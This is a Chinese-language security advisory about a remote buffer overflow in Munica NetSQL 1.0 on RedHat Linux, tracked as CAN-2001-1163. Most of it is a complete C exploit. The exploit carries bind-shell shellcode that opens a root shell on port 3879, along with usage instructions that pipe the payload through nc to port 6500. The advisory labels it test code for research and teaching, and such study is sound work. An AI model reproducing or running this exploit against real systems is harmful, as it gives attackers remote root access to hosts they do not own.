安全研究
安全漏洞
NetSQL远程缓冲区溢出漏洞
发布日期:2001-06-15
更新日期:2001-06-27
受影响系统:
描述:
Munica NetSQL 1.0
- RedHat Linux 7.1 i386
- RedHat Linux 7.0
- RedHat Linux 6.2E i386
- RedHat Linux 6.2
- RedHat Linux 6.1 i386
- RedHat Linux 6.0 i386
BUGTRAQ ID: 2885
CVE(CAN) ID: CAN-2001-1163
NetSQL是由Munica公司发布的一个数据库软件,发现其存在缓冲区溢出漏洞。
通过向NetSQL端口(一般是6500)发送超长的字符串,NetSQL会缓冲区溢出,利用这个
漏洞,远程攻击者可能在目标主机上以root权限执行任意代码。
<*来源:Papa-tudo (papatudo@jedi.com.br) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Papa-tudo (papatudo@jedi.com.br)提供了如下测试代码:
/* PRIVATE EXPLOIT, DONT DISTRO%$##$%$#
* Remote exploit for NetSQL server, by Sergio Monteiro a.k.a Papa-tudo
* netsqld - An SQL database server with Web interface
* check http://www.sekurity.com.br .
*
* There is an easily exploitable buffer overflow in netsql.
* This exploit was tested on redhat 6.2.
*
* Run like: ./netsql | nc host.com 6500
* Then connect to port 3879 for the rootshell.
*
* Greets: www.sekurity.com.br
* Author: Papa-tudo -
*
*PRIVATE EXPLOIT, DONT DISTRO%$##$%$#
*/
#include <stdio.h>
#include <string.h>
#define RET 0xbffea3d0
char crap[80];
char cmd[1024];
char shellcode[] =
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
int
main (int argc, char *argv[])
{
char *buf;
int bsize=180, offset = 0, len = 151, i;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) len = atoi(argv[3]);
buf = malloc(bsize);
memset (buf, '\x90', bsize);
memset(crap, '\x41', 80);
for (i = len; i < bsize - 4; i += 4)
*(long *) &buf[i] = RET + offset;
memcpy (buf + (len - strlen (shellcode)), shellcode, strlen (shellcode));
crap[sizeof(crap)] = '\0';
buf[bsize - 1] = '\0';
fprintf(stderr, "Return Address = 0x%x\n", RET + offset);
fprintf(stderr, "Running with offset %d\n", offset);
printf("76 CONNECT %s ON %s USER=\'netsql\' PASSWORD=\'none\'\n", crap,
buf);
}
建议:
临时解决方法:
限制对6500端口的访问
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.munica.com/webpak/
浏览次数:4902
严重程度:0(网友投票)
绿盟科技给您安全的保障